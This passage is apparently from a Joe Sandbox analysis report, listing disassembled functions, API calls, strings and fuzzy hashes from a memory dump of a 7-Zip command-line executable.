                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$CountCurrentErrorLastTick$CreateDirectoryProcessThread
                              • String ID: .tmp$d
                              • API String ID: 503816515-2797371523
                              • Opcode ID: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                              • Instruction ID: 82180a5b6ab57db0c59d385ddc4dea5708d2ff32c00f51812929c75a03b7c7ff
                              • Opcode Fuzzy Hash: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                              • Instruction Fuzzy Hash: E541252321860181DA70BB26E84076E7771B785BE4F448223EE9E47B60CE3CC582E703
                              Function 00F8A9FC Relevance: 22.7, APIs: 18, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                              • Instruction ID: 4d5ff8694240a0a250cf9d9085bf7299a11e2f9293fdac679f1193783c3c37ca
                              • Opcode Fuzzy Hash: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                              • Instruction Fuzzy Hash: FB51CD22714B8582EB60FB11E99129D7710EBD5BE0F485123EF8D1BB19CF2CC956D712
                              Function 00F84E4C Relevance: 22.7, APIs: 13, Strings: 2, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Incorrect volume size:, xrefs: 00F8503C
                              • zero size last volume is not allowed, xrefs: 00F85062
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow
                              • String ID: Incorrect volume size:$zero size last volume is not allowed
                              • API String ID: 3957182552-998621408
                              • Opcode ID: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                              • Instruction ID: 16c5245827a70891f0b431c938e770fd7a7f69e4ce95d68a5af4f85e77f3a3a4
                              • Opcode Fuzzy Hash: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                              • Instruction Fuzzy Hash: C761AE73204A8AA2DB64EF25E8907EDB320F785B94F808122DB9D47B64DF3CD955E740
                              Function 00F7E07C Relevance: 21.6, APIs: 17, Instructions: 349COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariant
                              • String ID:
                              • API String ID: 1677346816-0
                              • Opcode ID: b51a64e2049aaacb224f193728cd5ebf52c6ea1f6f529c4464fa16420fdb4b89
                              • Instruction ID: 48b5444a897ba5b15cb56312eee3e46ad8238244f8d7ca3ca5b6d551c317255e
                              • Opcode Fuzzy Hash: b51a64e2049aaacb224f193728cd5ebf52c6ea1f6f529c4464fa16420fdb4b89
                              • Instruction Fuzzy Hash: B0C19123704A4482CB60EF25D88026E7770F789B54F948123EB8EA7B25DF3DC955EB02
                              Function 00FBD4F8 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: ..\
                              • API String ID: 1294909896-2756224523
                              • Opcode ID: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                              • Instruction ID: c68b21c28847fb4b264c6da6592c89c3faa800542ceb9686b61484fcd7e64c92
                              • Opcode Fuzzy Hash: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                              • Instruction Fuzzy Hash: 8D61A52771468486CB60EF16E89029E7721FBC5BA4F584122EF4E1B758EF7DC842DB11
                              Function 00FC033C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputc
                              • String ID: Modified: $Path: $Size:
                              • API String ID: 2662072562-3207571042
                              • Opcode ID: 1538d324f453466ecd84c9ba88d1f3f2ed81e73a186bad75c1ee4b4f1d3be273
                              • Instruction ID: 17b170254e5095b2befa5145dbc10143bb0d63f2feb1c406442a6894db393658
                              • Opcode Fuzzy Hash: 1538d324f453466ecd84c9ba88d1f3f2ed81e73a186bad75c1ee4b4f1d3be273
                              • Instruction Fuzzy Hash: 70214162200A4282DE60EF15ED5037D2322FB85BF5F4482379E6D47AE5DF29C55AE301
                              Function 00FB179A Relevance: 20.1, APIs: 16, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                              • Instruction ID: 1db413da9421f77a571b59fa822d3bc875201c73ea20062ac30e58fd51e17693
                              • Opcode Fuzzy Hash: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                              • Instruction Fuzzy Hash: F2216D2224968982CBD0FB32D8A166E7710FBC2F84F849422EE4E57621CE3DC567A715
                              Function 00FB4824 Relevance: 18.2, APIs: 5, Strings: 7, Instructions: 210COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: : $ : MINOR_ERROR$...$Junction: $Link: $REPARSE:$WSL:
                              • API String ID: 1534225298-3981964144
                              • Opcode ID: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                              • Instruction ID: c42b77fa450b9280e450dbbb633a80eeec99de6b759d4002349ae029fc807e63
                              • Opcode Fuzzy Hash: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                              • Instruction Fuzzy Hash: 4471042221060292DB20EF26EC513AE7765F7817A8F44D123EB8A4775ADF7CC545FB12
                              Function 00F7D298 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 85libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$AddressHandleModuleProc
                              • String ID: : $ SP:$RtlGetVersion$Windows$ntdll.dll
                              • API String ID: 399046674-586651410
                              • Opcode ID: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                              • Instruction ID: 67cc1f8b42bec353207e0ef9da8f24ffa195d97e12b80ca8d15e4999c47b81d7
                              • Opcode Fuzzy Hash: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                              • Instruction Fuzzy Hash: EC313523218685A2CA70EB10EC513AEB331FBD4754F809117F19D42AB9DF7CC649EB02
                              Function 00FC2E04 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                              • API String ID: 1795875747-2836439314
                              • Opcode ID: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                              • Instruction ID: 51a8897ef2af0cfe2d24d7315c6c90da82c335155bfc979601edc8247033e873
                              • Opcode Fuzzy Hash: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                              • Instruction Fuzzy Hash: 4F11B1A261065293EF349B26DA457287722F748F94F489026CF4903E94DF79C8A9E300
                              Function 00FC6478 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID: $ MB$ Memory =
                              • API String ID: 3873070119-2616823926
                              • Opcode ID: a49bfbddc163a04b4ae8ca9172c6382178121f8a6e5564e2a5d71c7932fa1ea2
                              • Instruction ID: 56c8e120c1f634dc7394a8c336ebe307c8571af87d69807d747318516faf4b96
                              • Opcode Fuzzy Hash: a49bfbddc163a04b4ae8ca9172c6382178121f8a6e5564e2a5d71c7932fa1ea2
                              • Instruction Fuzzy Hash: 28110DA2204A4292DF20DB16E8557792331EBC8BE5F449232DE2E43AB4DF3CC599E700
                              Function 00FC2D88 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC2DA3
                              • fputs.MSVCRT ref: 00FC2DC0
                              • fputs.MSVCRT ref: 00FC2DD0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • fputs.MSVCRT ref: 00FC2DEE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                              • API String ID: 3873070119-657955069
                              • Opcode ID: 847c8679c7ee772cfa0ad331b0400e68872ccc8d0d254d1dc022f7c0616b6f24
                              • Instruction ID: 4b9245c92647bef992872190a4b7a2ede91992461198a9ebcf4ef93f95e16a83
                              • Opcode Fuzzy Hash: 847c8679c7ee772cfa0ad331b0400e68872ccc8d0d254d1dc022f7c0616b6f24
                              • Instruction Fuzzy Hash: A4F0EC66300B0696EE64EF66F9543696322EB99FD5F449033CE4E07B64EE2CC589E300
                              Function 00F77258 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$AddressHandleModuleProc
                              • String ID: CreateHardLinkW$kernel32.dll
                              • API String ID: 399046674-294928789
                              • Opcode ID: 9f6cbca637d8032f0e3d3d93c8c5b3ec0ac9f608109c27f1738fc1a47266ce67
                              • Instruction ID: 3eee3a3db86f3d7216d85e2e1c34e6b3322e77ad59465892c359600b654256a5
                              • Opcode Fuzzy Hash: 9f6cbca637d8032f0e3d3d93c8c5b3ec0ac9f608109c27f1738fc1a47266ce67
                              • Instruction Fuzzy Hash: 4F21F61361964141DEA0EB26EC5136F6311ABC2BE0F445133FD6E47761DE2DC841FA02
                              Function 00F805D0 Relevance: 13.9, APIs: 11, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6793e3eeda4356b0ad06c3aaa6d8200741175e165c6d1078bab77708f7daae62
                              • Instruction ID: eedddf19f5250e77adbb44de1967895ec522de1b217ea714a1eb8e7233d0d1a7
                              • Opcode Fuzzy Hash: 6793e3eeda4356b0ad06c3aaa6d8200741175e165c6d1078bab77708f7daae62
                              • Instruction Fuzzy Hash: 7551F723215A4495CBA0EF25D85059E7720FBC5BE4F884216FE9E47764EF3CC956EB00
                              Function 00F8A24C Relevance: 13.8, APIs: 8, Strings: 1, Instructions: 267COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID: \??\
                              • API String ID: 1473721057-3047946824
                              • Opcode ID: 9f9bbcf5d18d30a3798993ee832e19fae9996f9b02919a846ef4ed57bb486a54
                              • Instruction ID: 38181a155c6d0c8b3f68fa0ab267e7838965435537606213205e9959b3ac5b4f
                              • Opcode Fuzzy Hash: 9f9bbcf5d18d30a3798993ee832e19fae9996f9b02919a846ef4ed57bb486a54
                              • Instruction Fuzzy Hash: 0DB17B23208680D6DB60EF35D8442DE7760F785B94F584137EA8E4B729DF39C896EB12
                              Function 00FAA948 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: hash
                              • API String ID: 1534225298-3518522040
                              • Opcode ID: 2071902370ea14b5b163f69b3a0fcafdd086ae38bc45d5d212b601ffc978602b
                              • Instruction ID: 676e1149dd0d54a84f919e547a18dbe38ff8761285cc2056489a71364b9c9ecd
                              • Opcode Fuzzy Hash: 2071902370ea14b5b163f69b3a0fcafdd086ae38bc45d5d212b601ffc978602b
                              • Instruction Fuzzy Hash: 675107A3608780D5CB35AF29D80036D77A1D7C3BA8F148112EA4E076A9DB7DC58EE313
                              Function 00F841F4 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F71E58: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71E9F
                              • _CxxThrowException.MSVCRT ref: 00F842EE
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00F739AC: memmove.MSVCRT ref: 00F739D9
                              • free.MSVCRT ref: 00F842A5
                              • _CxxThrowException.MSVCRT ref: 00F842C8
                              • _CxxThrowException.MSVCRT ref: 00F84322
                              • free.MSVCRT ref: 00F843B6
                              • free.MSVCRT ref: 00F843BE
                              • free.MSVCRT ref: 00F843CC
                              Strings
                              • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 00F842D1, 00F84305
                              • The file operation error for listfile, xrefs: 00F84268
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$ErrorLastmemmove
                              • String ID: Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                              • API String ID: 2826704872-1487508633
                              • Opcode ID: 351beeec67b9c65a241a4d84b79b58a5cc51cb1c205b001d3c70bc4642ae7688
                              • Instruction ID: 8cf70fecd848ec64685dff8bdce77e05caa10260c9c8f1ce15d16c2646738ad8
                              • Opcode Fuzzy Hash: 351beeec67b9c65a241a4d84b79b58a5cc51cb1c205b001d3c70bc4642ae7688
                              • Instruction Fuzzy Hash: 5E41BD32314A8692DA10EF16E98079EB721F7D6BD0F844126EF8D57B68CB7CD906E700
                              Function 00F86904 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                                • Part of subcall function 00F73958: memmove.MSVCRT ref: 00F73997
                              • free.MSVCRT ref: 00F8693E
                              • free.MSVCRT ref: 00F86983
                              • free.MSVCRT ref: 00F869B0
                              • free.MSVCRT ref: 00F869E6
                              • free.MSVCRT ref: 00F86A50
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$CloseHandle
                              • String ID: :Zone.Identifier
                              • API String ID: 1247544577-2436405130
                              • Opcode ID: 22c892426fee73e167ffcf6538a0438297bd6935e972e90fdc12c223aa67d66b
                              • Instruction ID: 0462d20ba97b833fafc9913c389c0b7ff4888637945f2d201436fbb4180e9359
                              • Opcode Fuzzy Hash: 22c892426fee73e167ffcf6538a0438297bd6935e972e90fdc12c223aa67d66b
                              • Instruction Fuzzy Hash: 33415372104A4180DF50EB20E85039D7760EBC1BE8F54C213F69E9B5A9DF3CC985E742
                              Function 00FAFE56 Relevance: 12.6, APIs: 10, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 1a9010453f8884423405b25a672cb8940b963d6f8b7818a8295dd92102788598
                              • Instruction ID: eb588d51abf579d3b51f2e31b218467cacd9b239f8f40485f58178bdf55a1fb2
                              • Opcode Fuzzy Hash: 1a9010453f8884423405b25a672cb8940b963d6f8b7818a8295dd92102788598
                              • Instruction Fuzzy Hash: 03514DB7214A8486C7A1DB26E89035E7760F78ABD4F405412DE8E47B25CF3DC49AEB11
                              Function 00FB012C Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: af3f1e211811b37b9a1a8ed7a3c5ddc6e65841d653c1e5f38f8fe79044a4063c
                              • Instruction ID: e40c8103141cd39dabf56f4e848db32020298dc885f2b0e3b3dd4a885d37dccf
                              • Opcode Fuzzy Hash: af3f1e211811b37b9a1a8ed7a3c5ddc6e65841d653c1e5f38f8fe79044a4063c
                              • Instruction Fuzzy Hash: 104106B6205B4981CB68DB26E8943AE73A1FBC9F90F459422CE4E47B24DF3DC4A5D700
                              Function 00F83EF8 Relevance: 12.5, APIs: 10, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
